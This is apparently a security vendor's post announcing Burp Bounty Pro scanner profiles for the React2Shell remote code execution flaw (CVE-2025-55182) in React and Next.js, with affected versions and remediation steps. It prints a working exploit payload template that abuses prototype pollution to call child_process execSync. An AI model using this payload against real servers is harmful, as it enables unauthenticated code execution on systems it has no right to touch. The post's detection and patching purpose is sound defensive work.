CVE-2025-55182: New Detection Profiles for Burp Bounty Pro
CVE-2025-55182 (React2Shell):
New Detection Profiles for Burp Bounty Pro
Executive Summary
We have released three new detection profiles for CVE-2025-55182, a critical Remote Code Execution vulnerability affecting React Server Components and Next.js applications. With a CVSS score of 10.0 and active exploitation in the wild, this vulnerability poses an immediate threat to millions of web applications worldwide.
🔄 How to Get These Profiles
- Open Burp Suite
- Go to Extensions → Burp Bounty Pro
- Navigate to the About tab
- Click "Check For Updates"
The new profiles will be downloaded and imported automatically.
What is React2Shell?
CVE-2025-55182, dubbed "React2Shell" by security researchers, is an unsafe deserialization vulnerability in the React Server Components (RSC) Flight protocol. Discovered by Lachlan Davidson from Assetnote on December 3, 2025, this vulnerability allows unauthenticated attackers to achieve remote code execution on affected servers.
Key Facts
| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-55182 |
| CVSS Score | 10.0 (Critical) |
| CWE | CWE-502 (Deserialization of Untrusted Data) |
| CISA KEV | Added December 5, 2025 |
| Remediation Deadline | December 19, 2025 |
| Authentication Required | None |
| Exploit Complexity | Low |
Affected Versions
❌ Vulnerable
React:
19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js:
15.0.4 through 16.0.6
✅ Patched
React:
19.0.1, 19.1.2, 19.2.1
Next.js:
15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
Active Exploitation
Within hours of public disclosure, threat actors began actively exploiting this vulnerability. CISA added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog on December 5, 2025.
Observed threat actors include:
- Chinese APT groups (Earth Lamia, Jackpot Panda)
- Cryptomining operations
- Cobalt Strike deployment campaigns
The ease of exploitation (single HTTP request, no authentication) combined with the widespread adoption of Next.js makes this vulnerability particularly dangerous.
Technical Analysis
The Vulnerability
React Server Components use a protocol called "Flight" to serialize and transmit component trees between server and client. The vulnerability exists in how the Flight protocol deserializes incoming data from HTTP requests.
The exploit chain works as follows:
- Attacker sends a POST request with malicious multipart form data
- The payload uses JavaScript prototype pollution via
__proto__to manipulate object behavior - The polluted prototype chain allows access to
process.mainModule - Code execution is achieved through
require('child_process').execSync()
Exploit Payload Structure
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process')
.execSync('COMMAND').toString().trim();;
throw Object.assign(new Error('NEXT_REDIRECT'),
{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}The exploit abuses the Flight protocol's reference system ($1:__proto__:then) to achieve prototype pollution, then leverages JavaScript's prototype chain to gain code execution.
New Burp Bounty Pro Profiles
We have developed three detection profiles to cover different scanning scenarios:
CVE-2025-55182_React2Shell_RCE
Active ScanDetection Method: Mathematical Proof of Concept
This profile sends a payload that executes echo $((31337*31337)) on the target server. If vulnerable, the response will contain 982013569 in the x-action-redirect header, confirming code execution without causing harm.
x-action-redirect contains 982013569
CVE-2025-55182_React2Shell_RCE_OOB
Active Scan + CollaboratorDetection Method: Out-of-Band DNS/HTTP callback
For environments where response-based detection is not possible (WAF filtering, async processing), this profile uses Burp Collaborator to confirm code execution via DNS lookup.
CVE-2025-55182_React2Shell_RCE_Windows
Active ScanDetection Method: PowerShell Mathematical Proof
For Windows-based Node.js deployments, this profile uses PowerShell to perform the mathematical calculation: powershell -c "31337*31337".
x-action-redirect contains 982013569
Scanning Recommendations
Immediate Actions
- Update your profiles using the built-in update mechanism
- Scan all Next.js applications in your scope
- Prioritize internet-facing applications - these are most at risk
- Check for indicators of compromise if vulnerabilities are found
Detection Strategy
We recommend using the profiles in the following order:
- Start with CVE-2025-55182_React2Shell_RCE - fastest detection method
- Use OOB profile if standard detection fails (WAF bypass, blind environments)
- Use Windows profile for Windows Server deployments
These profiles have a very low false positive rate because detection requires exact mathematical results (982013569) or actual Collaborator callbacks. The exploit mechanism is specific to vulnerable React/Flight versions.
Remediation Guidance
If You Discover Vulnerable Applications
- Patch immediately - Update to the fixed versions listed above
-
Enable WAF protection:
- AWS WAF: Enable
AWSManagedRulesKnownBadInputsRuleSetv1.24+ - Cloudflare: Protection is auto-enabled
- AWS WAF: Enable
-
Monitor for exploitation - Check logs for POST requests with
Next-Actionheader
Post-Incident Actions
If exploitation is suspected:
- Rotate all secrets, API keys, and credentials
- Check for web shells and backdoors
- Review server logs for suspicious activity
- Conduct forensic analysis
- Report to your security team
References
Conclusion
CVE-2025-55182 represents a critical threat to the React/Next.js ecosystem. With active exploitation ongoing and a CISA remediation deadline of December 19, 2025, immediate action is required.
Update your Burp Bounty Pro profiles today and scan your targets before attackers do.
Stay safe. Hack responsibly. 🛡️